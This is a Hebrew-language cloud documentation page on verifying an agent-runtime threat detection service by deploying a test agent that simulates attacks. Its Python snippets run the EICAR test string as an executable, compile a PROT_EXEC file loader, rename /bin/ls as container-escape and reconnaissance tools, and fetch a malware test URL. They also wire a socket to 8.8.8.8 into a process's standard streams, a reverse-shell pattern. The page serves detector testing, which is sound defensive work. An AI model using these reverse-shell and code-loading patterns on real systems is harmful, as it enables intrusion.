בדף הזה מוסבר איך לוודא שזיהוי האיומים בפלטפורמת הנציגים פועל. לשם כך, מפעילים בכוונה גלאים ובודקים אם נמצאו ממצאים. התכונה Agent Platform Threat Detection היא שירות מובנה של Security Command Center.
לפני שמתחילים
כדי לזהות איומים פוטנציאליים על סוכני Agent Runtime, צריך לוודא שהשירות Agent Platform Threat Detection מופעל ב-Security Command Center.
הגדרת הסביבה
כדי לבדוק את התכונה 'זיהוי איומים בפלטפורמת הנציגים', צריך להגדיר נציג הדגמה שמדמה פעילות זדונית.
יצירת פרויקט והפעלת מעטפת
בוחרים או יוצרים Google Cloud פרויקט לשימוש בבדיקה.
כדי לבדוק את אמצעי הזיהוי, אפשר להשתמש במסוף Google Cloud וב-Cloud Shell.
עוברים אל Google Cloud המסוף.
בוחרים את הפרויקט שבו רוצים להשתמש לבדיקה.
לוחצים על הפעלת Cloud Shell.
אפשר גם להריץ את הוראות הבדיקה משורת פקודה מקומית.
הגדרת Agent Runtime
אם זו הפעם הראשונה שאתם משתמשים ב-Agent Runtime בפרויקט הזה, אתם צריכים להגדיר את סביבת Agent Runtime לפני שמתחילים. רושמים את השם של קטגוריית הביניים של Cloud Storage שיצרתם. מומלץ גם לעיין במדריך להתחלה מהירה בנושא Agent Runtime כדי ללמוד איך לפתח ולפרוס סוכן באמצעות Vertex AI SDK.
יצירת סקריפט בדיקה
תצטרכו ליצור כמה קבצים שישמשו לפריסת סוכן חדש לצורך בדיקה. לשם כך, צריך להשתמש בעורך טקסט, כמו nano.
יוצרים קובץ חדש בשם
requirements.txtעם התוכן הבא.google-cloud-aiplatform[agent_engines] google-adk google-genai aiohttp cloudpickle pydanticיוצרים קובץ ריק חדש בשם
installation_scripts/install.sh. חלק מהבדיקות דורשות הוספת תוכן לקובץ הזה.יוצרים קובץ חדש בשם
main.pyעם התוכן הבא. מחליפים את המשתניםPROJECT_ID,LOCATIONו-STAGING_BUCKET. שם קטגוריית הביניים חייב לכלול את הקידומתgs://.import asyncio import os import subprocess import socket import vertexai from vertexai import Client, agent_engines from google.adk.agents import llm_agent from google.adk.sessions.in_memory_session_service import InMemorySessionService # Replace with your own project, location, and staging bucket. LOCATION = "LOCATION" PROJECT_ID = "PROJECT_ID" # Staging bucket must have gs:// prefix STAGING_BUCKET = "STAGING_BUCKET" client = Client(project=PROJECT_ID, location=LOCATION) def _run_command(args, **kwargs): output = f"Called {' '.join(args)}\n" try: res = subprocess.run(args, capture_output=True, text=True, **kwargs) if res.stdout: output += f"Result: {res.stdout.strip()}\n" if res.stderr: output += f"Error: {res.stderr.strip()}\n" except subprocess.TimeoutExpired: output += "Command timed out as expected." return output # Tool to simulate threats. The function body will be replaced for individual # detector tests. def threat_detection_test(): output = _run_command(["sleep", "60"]) output += _run_command(["echo", "this is a fake threat"]) output += _run_command(["sleep", "10"]) return output root_agent = llm_agent.Agent( model="gemini-2.5-flash", name="threat_detection_test_agent", description="Runs threat detection test.", instruction=""" You are an agent that runs a threat detection test using a fake malicious command. """, tools=[threat_detection_test], ) async def main(): vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) app = agent_engines.AdkApp( agent=root_agent, session_service_builder=InMemorySessionService ) remote_agent = client.agent_engines.create( agent=app, config={ "display_name": "scc_threat_test_agent", "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY, "requirements": [ "google-cloud-aiplatform[agent_engines,adk]", "cloudpickle", "pydantic", ], "staging_bucket": STAGING_BUCKET, "extra_packages": [ "installation_scripts/install.sh", ], }, ) print("Deployed agent: ", remote_agent.api_resource.name) try: async for event in remote_agent.async_stream_query( user_id="threat_detection_tester", message="Run the threat detection test", ): print(event) finally: client.agent_engines.delete(name=remote_agent.api_resource.name, force=True) if __name__ == "__main__": asyncio.run(main())
הגדרת סביבה וירטואלית
יוצרים ומפעילים סביבה וירטואלית של Python.
python3 -m venv env source env/bin/activateמתקינים את יחסי התלות הנדרשים בסביבה הווירטואלית.
pip install -r requirements.txt
בדיקת הסקריפט
מריצים את הסקריפט מתוך הסביבה הווירטואלית באמצעות python3 main.py.
הפקודה הזו תימשך כמה דקות עד שהיא תיצור, תפרוס ותבצע את סוכן הבדיקה.
הסקריפט מוציא את שם המשאב של הסוכן שנפרס, וכמה אובייקטים של JSON, כולל תגובה של LLM ומטא-נתונים אחרים. אם נתקלתם בשגיאות הרשאה או בשגיאות פריסה בשלב הזה, תוכלו לעיין בפתרון הבעיות כדי להבין מה השלבים הבאים.
בדיקת מזהים
כדי לבדוק את הגלאים של Agent Platform Threat Detection, מחליפים את הקוד בפונקציה threat_detection_test בקוד שמדמה מתקפה. יכול להיות שיעבור זמן רב עד שהסקריפט יופעל ויריץ שאילתות על הסוכן. כדי לזרז את הבדיקה, אפשר לשלב את התוכן של כמה מהפונקציות האלה.
ביצוע: נוסף קובץ בינארי זדוני שהופעל
מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output += _run_command(["touch", "/tmp/test_mal_file"])
with open("/tmp/test_mal_file", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
output += _run_command(["sleep", "10"])
return output
ביצוע: נוספה טעינה של ספרייה זדונית
מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה. יכול להיות שתקבלו שגיאה מ-Vertex AI SDK לגבי ניתוח התגובה, אבל הממצא עדיין ייווצר.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
with open("/tmp/test_mal_lib", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
output += _run_command(["sleep", "10"])
return output
ביצוע: פירצה בקונטיינר
מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
output += _run_command(["sleep", "10"])
return output
ביצוע: הרצת כלי לתקיפת Kubernetes
מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
output += _run_command(["/tmp/amicontained"])
output += _run_command(["sleep", "10"])
return output
ביצוע: הפעלת כלי סיור מקומי
מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
output += _run_command(["/tmp/linenum.sh"])
output += _run_command(["sleep", "10"])
return output
ביצוע: קובץ בינארי זדוני שונה הופעל
Replace the `threat_detection_test` function in the test script, and then run the
test script.
```python
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```
ביצוע: ספרייה זדונית ששונתה נטענה
מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
output += _run_command(["sleep", "10"])
return output
זוהתה כתובת URL זדונית
מעדכנים את הקובץ installation_scripts/install.sh עם התוכן הבא.
#!/bin/bash
apt-get install -y curl --no-install-recommends
מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.
def threat_detection_test():
url = "https://testsafebrowsing.appspot.com/s/malware.html"
output = _run_command(["sleep", "60"])
output += _run_command(["curl", url])
output += _run_command(["sleep", "10"])
return output
Reverse Shell
מחליפים את הפונקציה threat_detection_test בסקריפט הבדיקה ומריצים את סקריפט הבדיקה.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("8.8.8.8", 53))
subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
output += _run_command(["sleep", "10"])
return output